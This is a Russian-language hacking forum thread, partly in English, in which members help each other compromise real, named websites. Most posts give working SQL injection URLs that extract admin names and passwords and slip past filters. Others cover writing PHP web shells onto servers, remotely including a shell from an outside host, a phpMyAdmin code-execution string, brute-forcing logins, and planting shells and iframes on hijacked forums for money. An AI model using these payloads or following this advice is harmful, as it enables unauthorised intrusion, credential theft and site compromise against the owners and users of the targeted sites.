Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?


1.пассы от фтп в БД не хранятся ..за оооочень редким исключением

2.ты имеешь в виду пхп шелл? подумай сам и ответь себе на вопрос..ключевое слово пхп

alerondel said:
Можно ли из бд вытащить пасс от фтп?
Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды
Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?


Тебе сначала нужно проникнуть в админку, оттуда залить шелл или через SQL-injection или другими возможными способами. Потом ты уже рутишь сервер / заливаешь на сервер radmin и управляешь им. А шелл допустим ты подкинул жертве...но шелл же написан на php! как он запуститься? чтобы запустился нужен .bat или .exe

Ясно спасибо за советы.Достал хеш самого админа,пароль мудреной ну да ладно,по слухам у него он 1 и тот же на всех его аккаунтах и прочих сервисах,почты.

+

Почему про шелл спрашивал потому что есть доступ в его клуб и 1 из Пк там сервер,хочу туда залезть,нужна бд.

Залил шелл

_http://site.com/images/shell.php.lalalajpg

Он не работает, и странице выводится вот это

http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png

как сделать так чтобы шелл заработал?

er9j6@ said:
Залил шелл
_http://site.com/images/shell.php.lalalajpg
Он не работает, и странице выводится вот это
http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png
как сделать так чтобы шелл заработал?


1) попробуй через инклуд(если есть)

2) попробуй залить так shell.jpg%00.php

aydin-ka said:
1) попробуй через инклуд(если есть)
2) попробуй залить так shell.jpg%00.php


Инклуда нет, и вариант shell.jpg%00.php - не проходит

js выводит ошибку:

Only JPEG files allowed

er9j6@ said:
Инклуда нет, и вариант shell.jpg%00.php - не проходит
js выводит ошибку:
Only JPEG files allowed


1) Попробуй подменить POST-запрос, через Tamper Data

2) SQL-injection есть??

aydin-ka said:
1) Попробуй подменить POST-запрос, через Tamper Data
2) SQL-injection есть??


sql-inj есть, щас попробую

er9j6@ said:
sql-inj есть, щас попробую


1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны� � путь/1.php'--

P.S: у пользователя должны быть права на запись

2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--

Если появиться Y то действуй дальше

aydin-ka said:
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны� � путь/1.php'--
P.S: у пользователя должны быть права на запись
2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--
Если появиться
Y
то действуй дальше


Доступа к mysql нет.

подскажите код батника, чтобы он открывал удаленное управление компьютером

Cherep said:
подскажите код батника, чтобы он открывал удаленное управление компьютером


Есть только батник кряк интернета, надо?

Может ТС имел что то типо этого ?

hххp:/thread276456-telnet.html

AppS said:
Может ТС имел что то типо этого ?
hххp:/thread276456-telnet.html


ТС имел ввиду вот это


darky said:
В этой и только в этой теме вы можете задать вопрос проспособ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках(для остального есть поиск по форуму).

Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.​
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях
крайне не рекомендуется

Это надо у него спросить

В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html

есть такой абзац


http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --


Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все но что то сегодня мы с ним не дружим)

Заранее спасибо!

AppS said:
Это надо у него спросить
В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html
есть такой абзац
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все
но что то сегодня мы с ним не дружим)
Заранее спасибо!


https://rdot.org/forum/showthread.php?t=352

Ломал Железного Майка , но столкнулся с этим:


Code:
http://ironmiketyson.ru/article_read.php?id=1+union+select+1+--+

хотя,


Code:
http://ironmiketyson.ru/article_read.php?id=1+order+by+1+--+

обрабатывается нормально. Раньше не сталкивался...

shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+

сам не могу проверить, проксика нет

stepashka_ said:
shadowrun
, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
сам не могу проверить, проксика нет


Пошло дело . Спасибо.

Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ??

З.Ы. Канал стабильный, без скачков.

http://www.play-money.ru/index.aspx?inf=30'


Можно ли как-то это использовать и куда копать?

[akep"]
DJ ][akep said:
Можно ли как-то это использовать и куда копать?


Для начало поищи другой уязвимый параметр

BigBear said:
Нашёл очень лакомую Time-Based скулю. Подскажите
нормальный софт
, ориентированный именно на неё ??
З.Ы. Канал стабильный, без скачков.


Хех. Цитирую сам себя уже.

Ну в общем нашёл я нужную утилиту. Называется Marathon Tool

Специально заточена под Time-Based SQL

Сайт автора тут (http://marathontool.codeplex.com/)

Прошу помощи!

Как всегда начну с фразы: "Уважаемые знатоки!"

Есть сайт:

1)file_priv=y

2)mq=off

3) есть /test.php

3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.

4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.

Теперь самое интересное:

config.ini прочитан так:

index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+

запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1

результат - ошибка но через пару часов при

/image/*****/id/*53 без инъекта появляется следущее:

яШяаJFIF

HHяб4ExifII*




b

j(

1
r2
Ћi‡
¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ

яя 
Ж 
zLEAD Technologies Inc. V1.01



F


N
(



V

ЦH
H
яШ� �аJFIF
HHянAdobe_CMяоAdobedЂ
яЫ„   
  яАc 
"

яЭ яД
?







 








 

3
!1AQa"qЃ2‘Ў

и т.д...

ВНИМАНИЕ ВОПРОС!

На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)

P.S. возможно не правильный запрос но если запрос сделать так

/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'

то ошибка такова:

Invalid query: File ' !=1' already exists

Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.

На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?

Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.

Надеюсь вопрос корректно составлен.

mix0x0 said:
На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
Надеюсь вопрос корректно составлен.


зайди в консоль(в шелле) ls -lah /путь/до/директории

2lion-art по твоим описаниям залить шелл как два пальца об асфальт но...

спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.

помогите залиться пожалуйста!

http://www.magiccamp.com.ua/

php:vtufgfhjkm

vaddd said:
помогите залиться пожалуйста!
http://www.magiccamp.com.ua/
php:vtufgfhjkm


Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...

Osstudio said:
Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...




Code:
http://www.magiccamp.com.ua/robots.txt

братюнь админку помочь найти?

залить мочой прямо на сервак он просил естессна,не шелл же.

upd:сууука,тролль пишется с двумя л (http://ru.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D0%BB%D0%BB%D1%8C)


P.S robots.txt и без тебя врубить догадался.


ууумница=*

o'clock said:

Code:
http://www.magiccamp.com.ua/robots.txt

братюнь админку помочь найти?
залить мочой прямо на сервак он просил естессна,не шелл же.
upd:сууука,тролль пишется с двумя л (http://ru.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D0%BB%D0%BB%D1%8C)


Ты может троль и с двумя "л", я шелл залил, но ему давать не буду.

P.S robots.txt и без тебя врубить догадался.

есть таблица с названием - 5

как удалить оттуда запись с id=4 ?

вот запрос на вывод данных:


?id=42+and+1=0+union+select+1,group_concat(id,0x3a ,text),3,4,5,6,7,8,9+from+table_name+--+


но удалить не получается, уже перепробовал всё что можно, например:


?id=42+and+1=0+delete+from+`5`+where+id=4+--+


что я делаю не так?

Goodwin_

где вы читали о данном способе?

Konqi said:
Goodwin_
где вы читали о данном способе?


про удаление? нигде, сам написал.

Goodwin_ said:
про удаление? нигде, сам написал.


тогда знайте что такое невозможно

Konqi said:
тогда знайте что такое невозможно


про delete прочитал вот тут:

/thread43966.html


5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL
Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: Большой справочник языку SQL .


спасибо за ответ.

Goodwin_ said:
про delete прочитал вот тут:
/thread43966.html
спасибо за ответ.


Goodwin_

вышенаписанные операторы существуют, но в данном случий синтаксис вашего запроса неверный

Konqi said:
Goodwin_
вышенаписанные операторы существуют, но в данном случий синтаксис вашего запроса неверный


подскажите, пожалуйста, верный.

Goodwin_ said:
подскажите, пожалуйста, верный.


в случий MySQL удалить данные никак не получится

Konqi said:
в случий MySQL удалить данные никак не получится


Если все очень криво, то можно:


HTML:
http://site.ru/php.php?id=123';DROP+TABLES+logs--+1

; означает конец первого запроса.

P.S. Возможно я не прав...

Osstudio said:
Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...


1) термин залиться уже не раз использовался в теме "Энциклопедия уязвимых скриптов" => даже для меня он кажется очевидным

2) админка по адресу /admin/ - sorry

3) шелл мне нужен на другом сайте, на этом же движке так что можешь смело продать его за 2$

P.S: Спасибо за помощь пользователю Gorev

tabletkO said:
Если все очень криво, то можно:

HTML:
http://site.ru/php.php?id=123';DROP+TABLES+logs--+1

;
означает конец первого запроса.
P.S. Возможно я не прав...


ты не прав в том случае, если это MySQL, нельзя использовать два запроса к базе в одном обращении.

всем привет подскажите чё лучше зделать есть админки на форумах штук 30 не юзанные траф от 800 до 2 к с форума, чё здеалать залить шеллы проифреймить как лучше зделать партнёрки посоветуете под шеллы заранее респект за любой совет?.

boortyhuhtyu said:
всем привет подскажите чё лучше зделать есть админки на форумах штук 30 не юзанные траф от 800 до 2 к с форума, чё здеалать залить шеллы проифреймить как лучше зделать партнёрки посоветуете под шеллы заранее респект за любой совет?.


отписать админам о уязвимостях.

нет ето не вариант дядя монеты нужны.

boortyhuhtyu said:
нет ето не вариант дядя монеты нужны.


тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.

boortyhuhtyu said:
нет ето не вариант дядя монеты нужны.


Если админы нормальные, могут отблагодарить ну или залей шеллы и продай

d1v said:
тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.


иди на завод сам еп.

Здравствуйте ещё раз. Интересует следующий вопрос:

Имеется доступ к phpmyadmin.

Права пользователя: ALL PRIVILEGES

Версия phpmyadmin: 3.3.4

Sql-injection на сайте не приводит к раскрытию путей.

Какие есть способы залить шелл?

Спасибо за ответ.

Предположение - если временно сменить название базы данных - скрипт при попытке подключится выдаст ошибку с раскрытием путей.

Aniweste said:
Здравствуйте ещё раз. Интересует следующий вопрос:
Имеется доступ к phpmyadmin.
Права пользователя: ALL PRIVILEGES
Версия phpmyadmin: 3.3.4
Sql-injection на сайте не приводит к раскрытию путей.
Какие есть способы залить шелл?
Спасибо за ответ.


LOAD_FILE('/путь/до/конфиг/апача');

Список можно посмотреть тут: /thread49775.html

Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html


Делаю sql-запрос - получаю ответ


Code:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1



Что именно я делаю не правильно?

Aniweste said:
Делаю sql-запрос - получаю ответ

Code:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1

Что именно я делаю не правильно?


select LOAD_FILE('/etc/apache/conf/httpd.conf')

Здравствуйте, у меня есть вопрос по nmap:

Распознаёт ли nmap кириллицу? Хочу использовать функцию брута joomla на форуме, но все ники кириллицей и пароли кириллицей сразу отправляются в невалид. как с этим можно побороться?

тем кто знает хорошо тему заливки файлов.


lion-art said:
Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяаJFIF

HHяб4ExifII*




b

j(

1
r2
Ћi‡
¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ

яя 
Ж 
zLEAD Technologies Inc. V1.01



F


N
(



V

ЦH
H
яШ� �аJFIF
HHянAdobe_CMяоAdobedЂ
яЫ„   
  яАc 
"

яЭ яД
?







 








 

3
!1AQa"qЃ2‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.


Если что пишите в ПМ все остальное не могу выложить в паблик

http://www.shopoldcoloradocity.com/content.php?id=-97+order+14-- (FALSE)

http://www.shopoldcoloradocity.com/content.php?id=-97 1=1 (Blind working)

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=4

Unknown column '20and' in 'where clause

Even

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=5

Any solution?

lightangel,

http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--

Site filter symbol "+". But you can use /**/

Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html


Попробывал все - результат NULL

Есть ещё какие-нибудь варианты?

уважаемые знатоки

Доброго дня всем, люди кто нибудь сталкивался с такой ситуацией:

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and+(select+1+from(select+count(*),(selec t+concat(0x3a,password_md5,0x3a)+from+AUTH_USER+li mit+1,1),floor(rand(0)*2))+having+min(0))+and+'1'= '1

Message of provider: SQLSTATE[42000]: Syntax error or access violation: 1248 Every derived table must have its own alias.' in....

или как вариант запрос havij

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and(select+1+from(select+count(*),concat( (select+(select+(select+concat(password_md5)+from+ AUTH_USER+limit+0,1))+from+information_schema.tabl es+limit+0,1),floor(rand(0)*2))x+from+information_ schema.tables+group+by+x)a)+and+'1'='1

с ошибкой вида:

Subquery returns more than 1 row.' in

lion-art

Я не сталкивался. Попробуй заменить + на /*--*/ , /**/ и т.д

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1' (SQL Error)

Cannot get order by, any solution?

Thank you, Ruslan1817.

I still have a problem.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+

Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3,4,group_concat(table_n ame),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +information_schema.tables%20where%20table_schema= database()+--+

And I get- Illegal mix of collations for operation 'UNION'

Why?

lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3,4,group_concat(table_n ame),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +information_schema.tables%20where%20table_schema= database()+--+
Why?


http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,(%73elect(@x)%66rom(%7 3elect(@x:=0x00),(%73elect(null)%66rom(%69nformati on_schema.%63olumns)%77here(%74able_schema!=0x696e 666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@ x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_ name,0x3a,%63olumn_name))))x),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20+--+

Thanks, can you give me a guide or paper on how to move foward.

lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3,4,group_concat(table_n ame),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +information_schema.tables%20where%20table_schema= database()+--+
And I get- Illegal mix of collations for operation 'UNION'
Why?


er9j6@, nice but easy solution is unhex(hex())


HTML:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infor mation_schema.tables+limit+0,1--+1

And easy construction

Site has 34 tables, I found out doing this.


Code:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infor mation_schema.tables+limit+33,1--+3

How do I get an info of a particular table?

lightangel said:
Site has 34 tables, I found out doing this.

Code:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infor mation_schema.tables+limit+33,1--+3

How do I get an info of a particular table?


Это русскоязычный форум. Используй переводчики.

По теме — полный FAQ (https://rdot.org/forum/showthread.php?t=124)

Thank you so much.

I've learnt it now.

Need a little help here.


Code:
http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,2,3,4,version(),6,7,8,9,10,11,12--

How to get tables, columns and data?

lightangel

There are tables


Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,group_concat%28TABLE_NAME%29,6,7,8,9,10,11 ,12/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--



PHP:
Admins,access

Aydin-ka, thanks a lot.


Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--

It's a basic WAF..

I've got the tables and columns and now I try this.


Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,1 0,11,12/**/FrOm/**/Admins--

Any solution?

lightangel said:
Aydin-ka, thanks a lot.

Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--

It's a basic WAF..
I've got the tables and columns and now I try this.

Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,1 0,11,12/**/FrOm/**/Admins--

Any solution?


table in other db.

http://www.shopoldcoloradocity.com/content.php?id=-1/**/UnIoN/**/SeLeCt/**/1,2,3,4,concat(Name,0x3a,Password),6,7,8,9,10,11,1 2/**/FrOm/**/dolphin_eval.Admins

http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+

Фильтр юнион...

shadowrun said:
http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...


избавиться от union можно с помощью error based например.


HTML:
http://www.poetryclub.com.ua/contest.php?id=29+or+1+group+by+concat((select+con cat(login,0x3a,password)+from+admins),floor(rand(0 )*2))having+min(0)--

I have a little problem here.


Code:
http://www.mul.edu.pk/home_old/index.php?id=39+order+by+20--

Shows 20 strings, now to get union select


Code:
http://www.mul.edu.pk/home_old/index.php?id=39+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--

Shows this error


Code:
Not Acceptable

An appropriate representation of the requested resource /home_old/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.



Code:
http://www.mul.edu.pk/home_old/index.php?id=39/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

The same error? Why this?

Что вы подразумеваете под этим?

lightangel said:
Что вы подразумеваете под этим?


во как)

значит в состоянии читать по русски.

http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf

а на этом сайте блокируется ип после нескольких запросов, поэтому заморачиваться с проксями не хочется. good luck.

Thanks so much. I'll use it.

Any tutorial on ASP injection please?

I want to start learning ASP Injection.


Code:
http://www.wsstp.eu/content/default.asp?PageId=882'

Any link? Help? Anything?

lightangel said:
Any tutorial on ASP injection please?
I want to start learning ASP Injection.

Code:
http://www.wsstp.eu/content/default.asp?PageId=882'

Any link? Help? Anything?


ссори бат ви хэв ноу асп инжекшен туториал. юз гугле, плиииииииииииз.

lightangel

maybe first you need to learn sql-injection and then move forward?

I have learnt so much about SQL on PHP sites.

I just need a link or book about MsAccess.

lightangel said:
I have learnt so much about SQL on PHP sites.
I just need a link or book about MsAccess.


http://www.fmsinc.com/microsoftaccess/query/snytax/update-query.html

I have a problem here guys.


Code:
http://www.expomotor-online.com/detalhesauto.php?id=71485'

Error shows it's vulnerable.

Cannot get its order by, why?

phpmyadmin 2.11.10 есть ли что по уязвимостям?

/scripts/setup.php есть

/config/ нет

Прошу помощи у гуру.

Заранее спасибо

s000r said:
phpmyadmin 2.11.10 есть ли что по уязвимостям?
/scripts/setup.php есть
/config/ нет
Прошу помощи у гуру.
Заранее спасибо


https://rdot.org/forum/showthread.php?t=347

lightangel said:
I have a problem here guys.

Code:
http://www.expomotor-online.com/detalhesauto.php?id=71485'

Error shows it's vulnerable.
Cannot get its order by, why?


I don't know, this is a very simple injection...


http://www.expomotor-online.com/detalhesauto.php?id=%27%20union%20select%201,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72, 73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89 ,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104 ,105,106,107,108,109,110,111,112,113,114,115,116,1 17,118,119,120,121,122,123,124,125--+


(take away the spaces)

Yeah it is but you used a tool to get number of columns.

lightangel said:
Yeah it is but you used a tool to get number of columns.


about what tool you say? this is quite easy to do by hands.

stepashka_ said:
https://rdot.org/forum/showthread.php?t=347


Видел уже, ничего не получается...

Skofield said:
about what tool you say? this is quite easy to do by hands.


But it maybe a lot of table with name like admin_accounts or admin_user...in this situation you need a tool...because if you do this work by hand, you spent a lot of time

aydin-ka said:
But it maybe a lot of table with name like admin_accounts or admin_user...in this situation you need a tool...because if you do this work by hand, you spent a lot of time


Причем здесь таблицы? я говорил о подборе колонок, что это можно и без программ сделать!

Здравствуйте. Есть сайт с возможностью выполнения произвольного php кода.

site.ru/file.php?e=phpinfo();

Подскажите как сделать инклуид шелла с удаленного сайта.

Пробовал так:


Code:
site.ru/file.php?e=@include("http://hack.ru/wso2.txt");

но не получается

Также пробовал без @ - без результата.

Подскажите что я делаю не так?

дайте помощь по metasploit я хочу атоковать машину на 80 порт но ни как не получается я даже не знаю к чему будет у меня домтуп помогите разобраться вот пост /thread304718.html

также еще вопрос как подбирать нужные сплоиты и нагрузки вот пост

/thread305294.html

tabletkO said:
Поражают такие люди =) Что именно не получается?)




Code:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();

token=подставляю свой. 0 реакции, показывает форму логина.

эксплойт от M4g я так понимаю должен выполнять код, прописанный в файле на фтп.

Результат выполнения выдает страницу scripts/setup.php

с двумя отличиями, вверху написаны заголовки запроса, а внизу цифра 0

Уважаемые, нужна ваша помощь. Есть сайт. Стоит на mssql , он уязвимый. Надо сдампить базу. Проблема в том , что внутри 20 баз, в каждой по 150-200 таблиц. Хави ломает через mssql with error. Шелл залить некуда, подскажите, что в такоц ситуации можно сделать ???

/thread43966.html

Пункты 2.2.х

вроде как...

o'clock said:
/thread43966.html
Пункты 2.2.х
вроде как...


Т.е. к примеру , информация нахоидтся в базе мастер, таблица аккаунтс , и 2 колонки имейл и пасс, как это вывести?? С учетом что в mssql не работает. Union функция.

h0w1tz3r said:
Т.е. к примеру , информация нахоидтся в базе мастер, таблица аккаунтс , и 2 колонки имейл и пасс, как это вывести?? С учетом что в mssql не работает. Union функция.


Если я все правильно понял то:

1) конструкция такова к примеру в cms_administrator хранятся пассы password

'+or+1+group%20by%20concat((select%20concat(0x3a,p assword,0x3a)%20from%20cms_administrator%20limit%2 00,1),floor(rand(0)*2))%20having%20min(0)%20or%201 ='

если это error based

2) если работаешь в havij то значения он выведет если нажать кнопку Get Data

3)вопрос, а с чего ты взял что шелл залить некуда? file_priv и m.q значения какие?

где через скулю я могу посмотреть права пользователя БД?

File_Priv from mysql.user

через вывод естественно

o'clock said:
File_Priv from mysql.user
через вывод естественно


это если юзер один.

а если юзеров > 1, то

File_Priv from mysql.user where user= 'юзер'

уважаемые знатоки

знатоки прошу помощи!! ресурс почти сломлен ситуация такова:

file_priv Y

m.q. off

load работает чтение на ура.

+and+'select+'+into+outfile+'+!=1'

ответ Invalid query: File ' !=1' already exists

и дело не в том что я не могу перевести. С переводом проблем нет. Просто я знаю что там такого файла нет. Если кто не разобрался - задача заливка Shell-а. Не выходит через админку скрипты не работают ограничение по ip идет. По определенным причинам не могу выложить в паблик если у кого было подобное отзовитесь

lion-art said:
знатоки прошу помощи!! ресурс почти сломлен ситуация такова:
file_priv Y
m.q. off
load работает чтение на ура.
+and+'select+'+into+outfile+'+!=1'
ответ Invalid query: File ' !=1' already exists
и дело не в том что я не могу перевести. С переводом проблем нет. Просто я знаю что там такого файла нет. Если кто не разобрался - задача заливка Shell-а. Не выходит через админку скрипты не работают ограничение по ip идет. По определенным причинам не могу выложить в паблик если у кого было подобное отзовитесь


путь есть? папка тоже?

d1v said:
путь есть? папка тоже?


Да есть

Есть все но в итоге нет ничего...

даже прочитан config.ini где логин и пасс от бд. но сама бд где то спрятана.

есть логины и пароли от админки зайти захожу но не могу там ничего нельзя сделать скрипты не работают. Только и остается кричать на помощь!

lion-art said:
Да есть
Есть все но в итоге нет ничего...
даже прочитан config.ini где логин и пасс от бд. но сама бд где то спрятана.
есть логины и пароли от админки зайти захожу но не могу там ничего нельзя сделать скрипты не работают. Только и остается кричать на помощь!


кинь в пм

Уважаемые, подскажите, был сайт уязвим по параметру product.php?id= буквально только что, все товары поменяли на html , а при входу на старый параметр сразу редирект. 7де еще можно покапать уязвимость ???

Было product.php?id=123{SQL} Значит стало:

123{SQL}.html

Abc-123{SQL}.html

123{SQL}-abc.html

И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??

h0w1tz3r said:
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??


union+select+1,file_priv,3+from+mysql.user+where+u ser=user()

tabletkO said:
union+select+1,file_priv,3+from+mysql.user+where+u ser=user()


А если стоит mssql ? Там юнион не работает параметр.

